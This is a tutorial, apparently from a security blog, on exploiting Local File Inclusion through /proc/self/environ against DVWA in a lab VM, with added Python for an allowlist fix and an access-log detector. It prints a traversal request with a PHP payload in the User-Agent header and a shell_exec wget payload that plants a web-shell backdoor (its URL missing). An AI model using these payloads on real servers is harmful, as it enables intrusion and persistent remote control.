Exploiting Local File Inclusion (LFI) vulnerability with the /proc/self/environ method | LFI Attacks

In this post we are going to see how an attacker can exploit an LFI vulnerability to achieve code execution by using the /proc/self/environ method.

What is the /proc/self/environ LFI method?

On Linux-based systems the environment variables of the current process (self) can be read from /proc/self/environ. When the web server (here Apache 2) handles a request, one of the environment variables it sets holds the request's User-Agent header, which the client controls. If /proc/self/environ can be included through the LFI vulnerability, "RCE" can be achieved by requesting that file while carrying the payload in the HTTP User-Agent header.
GET lfi.php?file=../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>
Now, if an attacker sends the above HTTP request to the web server:
  • first, the value of the User-Agent header becomes part of the environment of the process handling the request and is therefore visible in /proc/self/environ;
  • then the request "lfi.php?file=../../../proc/self/environ" includes the content of /proc/self/environ in the output page, and the payload it contains is executed by the PHP interpreter.
In this way a local file inclusion vulnerability can be leveraged into remote code execution. Now let's see an example. For the demonstration I am going to use the Metasploitable2 VM with DVWA; you can download it from the link below:

    Download Link : https://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip
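On the application side, the root cause is that the user-supplied 'page' (or 'file') parameter is used to build the path handed to include(). The Python snippet below is added here as an illustration and is not part of the original post or of DVWA's code; it mirrors the vulnerable concatenation pattern and contrasts it with two fixes: an allowlist that maps the parameter to fixed file names, and a containment check that normalises the candidate path and requires it to stay inside the page directory. PAGE_DIR and ALLOWED_PAGES are assumed values, not DVWA's real layout.

```python
import posixpath

# Constructed example values: the directory holding includable page files and an
# allowlist mapping the user-supplied "page" value to fixed file names.
PAGE_DIR = "/var/www/pages"
ALLOWED_PAGES = {
    "include": "include.php",
    "file1": "file1.php",
    "file2": "file2.php",
}


def vulnerable_resolve(page_param):
    """Mirrors the include(BASE . $_GET['page']) pattern: the parameter is
    concatenated onto the base directory and normalised, so a run of ".."
    segments walks out of PAGE_DIR. With a base three levels deep, the
    request from the post ("../../../proc/self/environ") lands exactly on
    /proc/self/environ."""
    return posixpath.normpath(posixpath.join(PAGE_DIR, page_param))


def allowlist_resolve(page_param):
    """Preferred fix: the parameter selects a key, never a path. Unknown keys
    yield None, so no user-controlled bytes ever become part of a filesystem
    path."""
    name = ALLOWED_PAGES.get(page_param)
    return None if name is None else posixpath.join(PAGE_DIR, name)


def contained_resolve(page_param):
    """Fallback when an allowlist is not practical: reject absolute paths and
    embedded NUL bytes (older PHP versions truncated paths at a NUL), then
    normalise the candidate and require it to remain inside PAGE_DIR."""
    if "\x00" in page_param or posixpath.isabs(page_param):
        return None
    candidate = posixpath.normpath(posixpath.join(PAGE_DIR, page_param))
    if posixpath.commonpath([PAGE_DIR, candidate]) != PAGE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("include", "file1.php", "../../../proc/self/environ"):
        print(f"{p!r:35} vulnerable={vulnerable_resolve(p)!r:25} "
              f"allowlist={allowlist_resolve(p)!r:30} contained={contained_resolve(p)!r}")
```

The allowlist variant is the one to reach for: it removes the path-building problem entirely rather than trying to filter it, and it is what DVWA's higher security levels approximate. The containment check is only a second line of defence, and it still has to run before any include() call, not after.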

In the DVWA web application we are going to use the "File Inclusion" page with the 'low' security setting.

There is an LFI vulnerability in the 'page' input.

Now let's try to include the /proc/self/environ file.

It gets included in the output page, which means the application is also vulnerable to the /proc/self/environ attack. Now we just have to modify the 'User-Agent' header of the request, which can be done with any intercepting proxy such as Burp Suite or ZAP, or with the Tamper Data plugin for Firefox. I am going to use Burp proxy.

First we are going to check whether our injected code executes, using the following payload:
<?php phpinfo();?> 
And our request will be:

Response output :

And it works, which means our code was executed on the web server. Now we are going to use the payload below:
<?php shell_exec('wget -O /var/www/shell.php');?>
The above PHP code downloads the backdoor file "shell.php" and stores it in the web root directory (/var/www/). Here I am using a simple Python HTTP server to host the backdoor file; in a real-world scenario any web server can host it. The code used for the PHP backdoor "shell.php" is:
  $cmd = $_GET['cmd'];
Now let's try the above payload.

Now let's try to access our backdoor.

And it works. If the 'User-Agent' header is filtered by the web application, PHP code can also be injected through the 'Accept-Encoding' header.
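On the detection side, a request that names /proc/self/environ combined with a PHP open tag in a request header is a strong signal in the web server's access log, and the alternate-header variant just mentioned is only catchable if that header is logged. The Python script below is an added example, not part of the original post: it scans constructed Apache access-log lines in the combined format with one extra quoted field, assumed to be produced by adding %{Accept-Encoding}i to the LogFormat, and flags lines where the URL-decoded request references /proc/self/environ or contains traversal sequences, or where the User-Agent, Referer or Accept-Encoding header carries a PHP open tag. The log lines, hosts and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines: Apache "combined" format plus one trailing quoted
# field holding the Accept-Encoding request header (custom LogFormat assumed).
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0" "gzip, deflate"
10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../proc/self/environ HTTP/1.1" 200 2311 "-" "<?php phpinfo();?>" "gzip"
10.0.0.9 - - [10/Oct/2023:13:58:41 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2402 "-" "Mozilla/5.0" "<?php phpinfo();?>"
10.0.0.7 - - [10/Oct/2023:14:01:10 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1289 "-" "Mozilla/5.0" "gzip, deflate, br"
'''.strip().splitlines()

# A quoted log field; Apache escapes embedded quotes as \" so allow backslash escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'

# Groups: 1 host, 2 timestamp, 3 request line, 4 status, 5 referer,
# 6 user-agent, 7 accept-encoding (absent on plain combined-format lines).
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + r' ' + QUOTED + r'(?: ' + QUOTED + r')?$'
)

# PHP open tags: "<?php" or the short echo tag "<?=".
PHP_TAG_RE = re.compile(r'<\?(?:php|=)', re.IGNORECASE)


def decode(value):
    """URL-decode twice so single- and double-encoded payloads compare alike."""
    return unquote(unquote(value))


def analyse_line(line):
    """Return a finding dict for a suspicious line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, ts, request, status, referer, ua, accept_enc = m.groups()
    reasons = []

    path = decode(request).lower()
    if "/proc/self/environ" in path:
        reasons.append("request references /proc/self/environ")
    elif "../" in path or "..\\" in path:
        reasons.append("directory traversal in request")

    for name, value in (("User-Agent", ua), ("Referer", referer),
                        ("Accept-Encoding", accept_enc)):
        if value and PHP_TAG_RE.search(decode(value)):
            reasons.append(f"PHP open tag in {name} header")

    if not reasons:
        return None
    return {"host": host, "time": ts, "request": request,
            "status": int(status), "reasons": reasons}


def scan(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [hit for hit in map(analyse_line, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} {hit['status']} "
              f"{hit['request']!r}: {'; '.join(hit['reasons'])}")
```

In the sample, the second and third lines are flagged: the first probe carries the tag in User-Agent, the second hides the traversal behind URL encoding and moves the tag to Accept-Encoding. A 200 status on a /proc/self/environ request is the detail to escalate on, since it suggests the include succeeded rather than being blocked.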
